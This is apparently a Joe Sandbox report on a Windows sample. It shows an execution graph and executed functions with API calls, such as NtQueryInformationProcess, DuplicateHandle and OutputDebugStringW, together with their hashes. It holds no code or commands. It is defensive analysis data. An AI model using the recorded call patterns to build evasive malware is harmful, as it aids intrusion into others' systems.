                                                                                                        execution_graph 44745 521a351 44746 521a35b 44745->44746 44749 5219c24 44746->44749 44748 521a364 44750 5219c2f 44749->44750 44753 129aac0 44750->44753 44751 521ef84 44751->44748 44754 129aacb 44753->44754 44757 129aaf0 44754->44757 44756 129b10d 44756->44751 44759 129aafb 44757->44759 44758 129b881 44758->44756 44759->44758 44762 52100e9 44759->44762 44769 52100f8 44759->44769 44763 5210119 44762->44763 44764 521013d 44763->44764 44766 5210310 DuplicateHandle 44763->44766 44776 5210298 44763->44776 44781 52102a8 44763->44781 44786 5210301 44763->44786 44764->44758 44766->44764 44770 5210119 44769->44770 44771 521013d 44770->44771 44772 5210301 DuplicateHandle 44770->44772 44773 5210310 DuplicateHandle 44770->44773 44774 52102a8 CreateWindowExW 44770->44774 44775 5210298 CreateWindowExW 44770->44775 44771->44758 44772->44771 44773->44771 44774->44771 44775->44771 44777 52102a8 44776->44777 44778 52102ef 44777->44778 44791 5210fa4 44777->44791 44795 5210fb8 44777->44795 44778->44764 44783 52102b5 44781->44783 44782 52102ef 44782->44764 44783->44782 44784 5210fa4 CreateWindowExW 44783->44784 44785 5210fb8 CreateWindowExW 44783->44785 44784->44782 44785->44782 44787 5210320 44786->44787 44788 521033d 44787->44788 44789 52103b1 DuplicateHandle 44787->44789 44790 52103c0 DuplicateHandle 44787->44790 44788->44764 44789->44788 44790->44788 44792 5210fb8 44791->44792 44794 5211008 44792->44794 44799 52105f4 44792->44799 44794->44794 44796 5210fe0 44795->44796 44797 52105f4 CreateWindowExW 44796->44797 44798 5211008 44796->44798 44797->44798 44800 52105ff 44799->44800 44804 5212df0 44800->44804 44809 5212e08 44800->44809 44801 52110b1 44801->44794 44806 5212dff 44804->44806 44805 5212e45 44805->44801 44806->44805 44815 5213c60 44806->44815 44820 5213c53 44806->44820 44811 5212e39 44809->44811 44812 5212f39 44809->44812 44810 5212e45 44810->44801 44811->44810 44813 5213c60 CreateWindowExW 44811->44813 44814 5213c53 CreateWindowExW 44811->44814 44812->44801 44813->44812 44814->44812 44816 5213c8b 44815->44816 44817 5213d3a 44816->44817 44825 5214b40 44816->44825 44828 5214b33 44816->44828 44822 5213c60 44820->44822 44821 5213d3a 44821->44821 44822->44821 44823 5214b40 CreateWindowExW 44822->44823 44824 5214b33 CreateWindowExW 44822->44824 44823->44821 44824->44821 44826 52126a8 CreateWindowExW 44825->44826 44827 5214b75 44826->44827 44827->44817 44829 5214b40 44828->44829 44830 52126a8 CreateWindowExW 44829->44830 44831 5214b75 44830->44831 44831->44817 44832 129e218 44833 129e25a 44832->44833 44834 129e260 GetModuleHandleW 44832->44834 44833->44834 44835 129e28d 44834->44835 44654 52152f3 44658 5215328 44654->44658 44662 5215318 44654->44662 44655 5215306 44659 521533c 44658->44659 44661 5215358 44659->44661 44666 5210310 44659->44666 44661->44655 44663 521533c 44662->44663 44664 5210310 DuplicateHandle 44663->44664 44665 5215358 44663->44665 44664->44665 44665->44655 44667 5210320 44666->44667 44668 521033d 44667->44668 44671 52103b1 44667->44671 44676 52103c0 44667->44676 44668->44661 44672 52103c0 44671->44672 44681 52109a8 44672->44681 44684 5210998 44672->44684 44673 52104f3 44673->44668 44677 5210406 44676->44677 44679 52109a8 DuplicateHandle 44677->44679 44680 5210998 DuplicateHandle 44677->44680 44678 52104f3 44678->44668 44679->44678 44680->44678 44688 5210594 44681->44688 44685 52109a8 44684->44685 44686 5210594 DuplicateHandle 44685->44686 44687 52109d6 44686->44687 44687->44673 44689 5210a10 DuplicateHandle 44688->44689 44690 52109d6 44689->44690 44690->44673 44733 85abcf8 44736 85abcf9 44733->44736 44737 85ab914 44736->44737 44741 85ab920 44736->44741 44738 85ac638 OutputDebugStringW 44737->44738 44740 85ac6b7 44738->44740 44740->44736 44742 85ac6e8 CloseHandle 44741->44742 44744 85ac756 44742->44744 44744->44736 44836 124d0dc 44837 124d0f4 44836->44837 44838 124d14e 44837->44838 44843 52126d4 44837->44843 44852 5214d3b 44837->44852 44856 5214d48 44837->44856 44860 5215aa8 44837->44860 44844 52126df 44843->44844 44845 5215b19 44844->44845 44847 5215b09 44844->44847 44848 5215b17 44845->44848 44885 52127fc 44845->44885 44869 5215c40 44847->44869 44874 5215c3b 44847->44874 44879 5215d0c 44847->44879 44853 5214d48 44852->44853 44854 52126d4 CallWindowProcW 44853->44854 44855 5214d8f 44854->44855 44855->44838 44857 5214d6e 44856->44857 44858 52126d4 CallWindowProcW 44857->44858 44859 5214d8f 44858->44859 44859->44838 44861 5215ab8 44860->44861 44862 5215b19 44861->44862 44864 5215b09 44861->44864 44863 52127fc CallWindowProcW 44862->44863 44865 5215b17 44862->44865 44863->44865 44866 5215c40 CallWindowProcW 44864->44866 44867 5215c3b CallWindowProcW 44864->44867 44868 5215d0c CallWindowProcW 44864->44868 44866->44865 44867->44865 44868->44865 44870 5215c54 44869->44870 44889 5215ce8 44870->44889 44893 5215cf8 44870->44893 44871 5215ce0 44871->44848 44875 5215c40 44874->44875 44877 5215ce8 CallWindowProcW 44875->44877 44878 5215cf8 CallWindowProcW 44875->44878 44876 5215ce0 44876->44848 44877->44876 44878->44876 44880 5215cca 44879->44880 44881 5215d1a 44879->44881 44883 5215ce8 CallWindowProcW 44880->44883 44884 5215cf8 CallWindowProcW 44880->44884 44882 5215ce0 44882->44848 44883->44882 44884->44882 44886 5212807 44885->44886 44887 52171fa CallWindowProcW 44886->44887 44888 52171a9 44886->44888 44887->44888 44888->44848 44890 5215cf8 44889->44890 44891 5215d09 44890->44891 44896 5217131 44890->44896 44891->44871 44894 5215d09 44893->44894 44895 5217131 CallWindowProcW 44893->44895 44894->44871 44895->44894 44897 52127fc CallWindowProcW 44896->44897 44898 521714a 44897->44898 44898->44891 44691 1297f30 44692 1297f57 44691->44692 44693 1298034 44692->44693 44695 1296914 44692->44695 44696 1298fc0 CreateActCtxA 44695->44696 44698 1299083 44696->44698 44899 521e9d8 44900 5219c24 2 API calls 44899->44900 44901 521e9e5 44900->44901 44699 85a72c0 44700 85a72c1 44699->44700 44703 85aa070 44700->44703 44701 85a72dd 44704 85aa074 44703->44704 44708 85aafb8 44704->44708 44712 85aafa8 44704->44712 44705 85aa146 44705->44701 44709 85aafca 44708->44709 44716 85aafe8 44709->44716 44713 85aafca 44712->44713 44715 85aafe8 NtQueryInformationProcess 44713->44715 44714 85aafde 44714->44705 44715->44714 44717 85aafec 44716->44717 44721 85ab0b8 44717->44721 44725 85ab0c8 44717->44725 44718 85aafde 44718->44705 44722 85ab0bc 44721->44722 44729 85a7244 44722->44729 44726 85ab0c9 44725->44726 44727 85a7244 NtQueryInformationProcess 44726->44727 44728 85ab173 44727->44728 44728->44718 44730 85ab228 NtQueryInformationProcess 44729->44730 44732 85ab173 44730->44732 44732->44718

                                                                                                        Executed Functions

                                                                                                        Function 085AB220 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 085AB2A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InformationProcessQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 1778838933-0
                                                                                                        • Opcode ID: 5477318893e47d392e47b47a861c0da5c8205527d9a392debc101ec2353c3ce1
                                                                                                        • Instruction ID: 82626c74b2c8729a3703096e3096204a97a61e29c156d57a2a0df173c0462463
                                                                                                        • Opcode Fuzzy Hash: 5477318893e47d392e47b47a861c0da5c8205527d9a392debc101ec2353c3ce1
                                                                                                        • Instruction Fuzzy Hash: EA21D3B5901249DFCB10CF9AD884ADEFFF4BF48320F10852AE958A7211C375A554CFA5
                                                                                                        Function 085A7244 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 085AB2A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InformationProcessQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 1778838933-0
                                                                                                        • Opcode ID: f510f5f694d511752bfccbed296a367433de69b8fc94a5382b53a29110e4b270
                                                                                                        • Instruction ID: a82f473b258bae55b3604aaa998c2c1f1cb19d649bf81da0d5f670807c24ef4e
                                                                                                        • Opcode Fuzzy Hash: f510f5f694d511752bfccbed296a367433de69b8fc94a5382b53a29110e4b270
                                                                                                        • Instruction Fuzzy Hash: C321EDB5900249DFCB10CF9AD884ADEBBF4FF48320F10842AE918A7250D374A954CFA5
                                                                                                        Function 052126A8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05214CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: b8748de70466ee683c35b471f47c830630b09808626cfd53d592376d18024c62
                                                                                                        • Instruction ID: 2150f99eb8828c9e09a403f11c6029c01b242edde4a2d59f5aa5446277630eaa
                                                                                                        • Opcode Fuzzy Hash: b8748de70466ee683c35b471f47c830630b09808626cfd53d592376d18024c62
                                                                                                        • Instruction Fuzzy Hash: B451CFB1D103099FDF14DF99C984ADEBBF5BF48310F24812AE819AB210D775A885CF94
                                                                                                        Function 05214B84 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05214CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: f2e5850dc85416a3382acb0da1292d73a02af8e43d77db3ccacecf1835eb7120
                                                                                                        • Instruction ID: 92263c05c9d82462c7b026686a2c4754eb9fe4fc641fc703cd01061d307a463b
                                                                                                        • Opcode Fuzzy Hash: f2e5850dc85416a3382acb0da1292d73a02af8e43d77db3ccacecf1835eb7120
                                                                                                        • Instruction Fuzzy Hash: D851CFB1D103099FDF14CFA9C884ADEBBF5BF48314F24812AE819AB210D771A885CF95
                                                                                                        Function 052127FC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05217221
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: fe688fb5067d3431e2fc83a423129b001629b06a865f131d80809889b596222f
                                                                                                        • Instruction ID: a7f09a3932d9e22445e3993e1408a04f6f65cd1b2655e1258ee8c6becf62b8bc
                                                                                                        • Opcode Fuzzy Hash: fe688fb5067d3431e2fc83a423129b001629b06a865f131d80809889b596222f
                                                                                                        • Instruction Fuzzy Hash: 46412CB4910209CFCB14CF99C488AABBBF5FF98314F24C459E919AB321D774A841CFA4
                                                                                                        Function 01296914 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01299071
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1778431812.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_1290000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: c9f7a892ca4e2db36c2fa46b2b674413352b935720820e8d0522b83faf332f7f
                                                                                                        • Instruction ID: 5df9f857ed062fe7aa3dee4c2766919c37bd438eb04d599a6c67e5c581e413f7
                                                                                                        • Opcode Fuzzy Hash: c9f7a892ca4e2db36c2fa46b2b674413352b935720820e8d0522b83faf332f7f
                                                                                                        • Instruction Fuzzy Hash: AC41FFB0C00619CBDF24DFA9C884BDEBBF5BF49314F20806AD518AB255DBB56985CF90
                                                                                                        Function 085AB8E4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 085AC6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1166629820-0
                                                                                                        • Opcode ID: 91058a4f2ae62afaa0f828b7c9295efeba91fd193440fb60f5f017bd85c50d26
                                                                                                        • Instruction ID: 6da402b4a28bf521c468f730d8aa70029c88de1083ac8a42a11362ecc47154c2
                                                                                                        • Opcode Fuzzy Hash: 91058a4f2ae62afaa0f828b7c9295efeba91fd193440fb60f5f017bd85c50d26
                                                                                                        • Instruction Fuzzy Hash: 5B219CB18056998FCB01DFADC8946DEBFF4FF49320F14805AD454AB251D334A944CFA9
                                                                                                        Function 05210594 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,052109D6,?,?,?,?,?), ref: 05210A97
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 248c239b9569650e662fed5d8b7b0e9bfa2ba0ab526332f1e7593c5636dce7e3
                                                                                                        • Instruction ID: 69720c48ff536a5bcbab7b7a8d811f2431b005e7d40bd48be3a39f4780420cff
                                                                                                        • Opcode Fuzzy Hash: 248c239b9569650e662fed5d8b7b0e9bfa2ba0ab526332f1e7593c5636dce7e3
                                                                                                        • Instruction Fuzzy Hash: B22103B5901209EFDB10CF9AD984ADEBBF4EB48310F10841AE958A3350D378A950CFA4
                                                                                                        Function 05210A09 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,052109D6,?,?,?,?,?), ref: 05210A97
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784878008.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5210000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: d1ce78a290688a858e427f1086df4aefccc8502b1b627bafbd976a0e246a337e
                                                                                                        • Instruction ID: 28c05b14670cc08175131014f8c8189f9ae7b5cb73842d9e5cb893f84f891a5c
                                                                                                        • Opcode Fuzzy Hash: d1ce78a290688a858e427f1086df4aefccc8502b1b627bafbd976a0e246a337e
                                                                                                        • Instruction Fuzzy Hash: 9721E3B5901219EFDB10CFAAD984ADEBBF4FB48320F14841AE958A3250D374A944CFA5
                                                                                                        Function 085AB914 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 085AC6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1166629820-0
                                                                                                        • Opcode ID: 76df3b1578658649db25fcf2e43fed193e5bc243b7a7cb3a75fee180a5180d2b
                                                                                                        • Instruction ID: a931aee04d5d7515c25d49c85d6e7f0f9dc50c67f47297a81466ef86d746d374
                                                                                                        • Opcode Fuzzy Hash: 76df3b1578658649db25fcf2e43fed193e5bc243b7a7cb3a75fee180a5180d2b
                                                                                                        • Instruction Fuzzy Hash: 961112B5C006599BCB14CF9AD884A9EFBF8FB48320F10812AE819B7340D774A944CFA5
                                                                                                        Function 085AC631 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 085AC6A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1166629820-0
                                                                                                        • Opcode ID: 0a7ae7bacf3442b7384bb34980c4da4b575759dc9e2b7f8f814c9f38ec11e446
                                                                                                        • Instruction ID: 2525e93f4e64ff66a286c93b0f35f2cf5b8f80158a697c370eddd1c928c7e29e
                                                                                                        • Opcode Fuzzy Hash: 0a7ae7bacf3442b7384bb34980c4da4b575759dc9e2b7f8f814c9f38ec11e446
                                                                                                        • Instruction Fuzzy Hash: 421126B5C006599FCB14CF9AD484ADEFBF4FB48320F20811AD819B7250C774A944CFA5
                                                                                                        Function 0129E218 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0129E27E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1778431812.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_1290000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: 302ef3981da3d034f6f71de0a3f2fab3bd4e6cc8d60fd6000eb0cf99c1fe96ab
                                                                                                        • Instruction ID: 83a386cb1c0726fe8b0347564e6a7b9bfee16273b0e2433ffcc53096144905a4
                                                                                                        • Opcode Fuzzy Hash: 302ef3981da3d034f6f71de0a3f2fab3bd4e6cc8d60fd6000eb0cf99c1fe96ab
                                                                                                        • Instruction Fuzzy Hash: C11110B5C00349CFDB14CF9AC844ADEFBF4EB88324F10846AD928A7210C379A545CFA1
                                                                                                        Function 05228CAC Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (bq
                                                                                                        • API String ID: 0-149360118
                                                                                                        • Opcode ID: 942a692e5fae3e381d0db5c57751fe588689598b18bfb4e228b70a7f1cb1247c
                                                                                                        • Instruction ID: 7b8c1afff1d560f68a11f3664c5f4b07f8fd2f4db36b3e2351412a0deb99aa5d
                                                                                                        • Opcode Fuzzy Hash: 942a692e5fae3e381d0db5c57751fe588689598b18bfb4e228b70a7f1cb1247c
                                                                                                        • Instruction Fuzzy Hash: 95910275A15219EFCB18DFA9D8486AEBFF6FF88300F14846AE446A7790DB349841CF50
                                                                                                        Function 0522F650 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @
                                                                                                        • API String ID: 0-2766056989
                                                                                                        • Opcode ID: 34d8f0cea1ed563dc0efe8a70a5cca1d77d3ee73022fb61a0baac3263a85acee
                                                                                                        • Instruction ID: 0d930ac967bbaee67039c1b250d350e307ec80fc071c1bf34f835aff6eb2186b
                                                                                                        • Opcode Fuzzy Hash: 34d8f0cea1ed563dc0efe8a70a5cca1d77d3ee73022fb61a0baac3263a85acee
                                                                                                        • Instruction Fuzzy Hash: CCD14D3591021ACFCF05CFA8C5949EDF7B1FF48314B258659D8067B259EB70AA8ACF80
                                                                                                        Function 0522F640 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 7ba618357d32f2b039699c49d01ae0b7eb3e72161ffb2e49cd654f5fc411f023
                                                                                                        • Instruction ID: 73fd6c3c601eeab314436a84df7b9210094234ced2428d970cc73bbed4cff512
                                                                                                        • Opcode Fuzzy Hash: 7ba618357d32f2b039699c49d01ae0b7eb3e72161ffb2e49cd654f5fc411f023
                                                                                                        • Instruction Fuzzy Hash: A6A1FE3591021ACFCF05DFA8C9948DDB7B5FF58314B218655D8066B259EB70B98ACF80
                                                                                                        Function 05228C74 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hbq
                                                                                                        • API String ID: 0-1245868
                                                                                                        • Opcode ID: eb349f32561da2a07a1180567f1fcb735f9fb842193d0ab9b756593bc0cbec85
                                                                                                        • Instruction ID: 28abedca7c358eb036f2f5473413462530d835239fcd28ef833baf0c4c78af82
                                                                                                        • Opcode Fuzzy Hash: eb349f32561da2a07a1180567f1fcb735f9fb842193d0ab9b756593bc0cbec85
                                                                                                        • Instruction Fuzzy Hash: CE4170B5A00318DFCB14DFA9C484AAEBBF5FF88310F108429E449E7750DB75A945CBA1
                                                                                                        Function 085AC6E0 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 085AC747
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: 4e4e9bec638be6766fc67c0b9a6559876d6a450ae35135eb9b01db350ac1a0d6
                                                                                                        • Instruction ID: 3a48c0f51d74e51b63e97a8aa948b63076ef6cc932d81554f50376b9a7f0d6dd
                                                                                                        • Opcode Fuzzy Hash: 4e4e9bec638be6766fc67c0b9a6559876d6a450ae35135eb9b01db350ac1a0d6
                                                                                                        • Instruction Fuzzy Hash: 8C115BB5800249CFCB10CF9AD4857DEBBF4EF49320F20846AD554A7251C378A944CFA5
                                                                                                        Function 085AB920 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 085AC747
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786608297.00000000085A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_85a0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: a36730f8e3fb812197d070cfecbdf594ddd47cd0df04c426e0a629dc96e933b2
                                                                                                        • Instruction ID: f9bfba1af83ae7f8c70f15136d3a090b0e15d7ecaa3b0966d8d98c29469d7f51
                                                                                                        • Opcode Fuzzy Hash: a36730f8e3fb812197d070cfecbdf594ddd47cd0df04c426e0a629dc96e933b2
                                                                                                        • Instruction Fuzzy Hash: 5F113AB1800249CFDB10DF9AC584BDEFBF8FB48320F10846AD558A7251D778A944CFA5
                                                                                                        Function 0522AD30 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-325317158
                                                                                                        • Opcode ID: 468f75be58fd20cd81780bf56c1b70e5fc795a5ef054d4d3a925888e7ca638c3
                                                                                                        • Instruction ID: b964c353ee0b3348ab45d79aae25af756203c03d8c5e565c32228ba62332c6a4
                                                                                                        • Opcode Fuzzy Hash: 468f75be58fd20cd81780bf56c1b70e5fc795a5ef054d4d3a925888e7ca638c3
                                                                                                        • Instruction Fuzzy Hash: E8112EB9900258CFCB20DF99C588BDEFBF4AF48324F20841AD459A7650D378A984CFA0
                                                                                                        Function 0522C9A8 Relevance: .6, Instructions: 551COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: acf986f2a38c7cce739e9f7f0c376faf7322aaedc497144eed7b082db49f8d6a
                                                                                                        • Instruction ID: 95debcc760c718d0f9a29b87bacc5462844eb167cceedfae5ed550e169bf7923
                                                                                                        • Opcode Fuzzy Hash: acf986f2a38c7cce739e9f7f0c376faf7322aaedc497144eed7b082db49f8d6a
                                                                                                        • Instruction Fuzzy Hash: 6A42FA35E2062ADBCB14DF68C8846EDF7B1BF49304F1086A9D459BB211EB70AE85CF40
                                                                                                        Function 0522C998 Relevance: .3, Instructions: 344COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
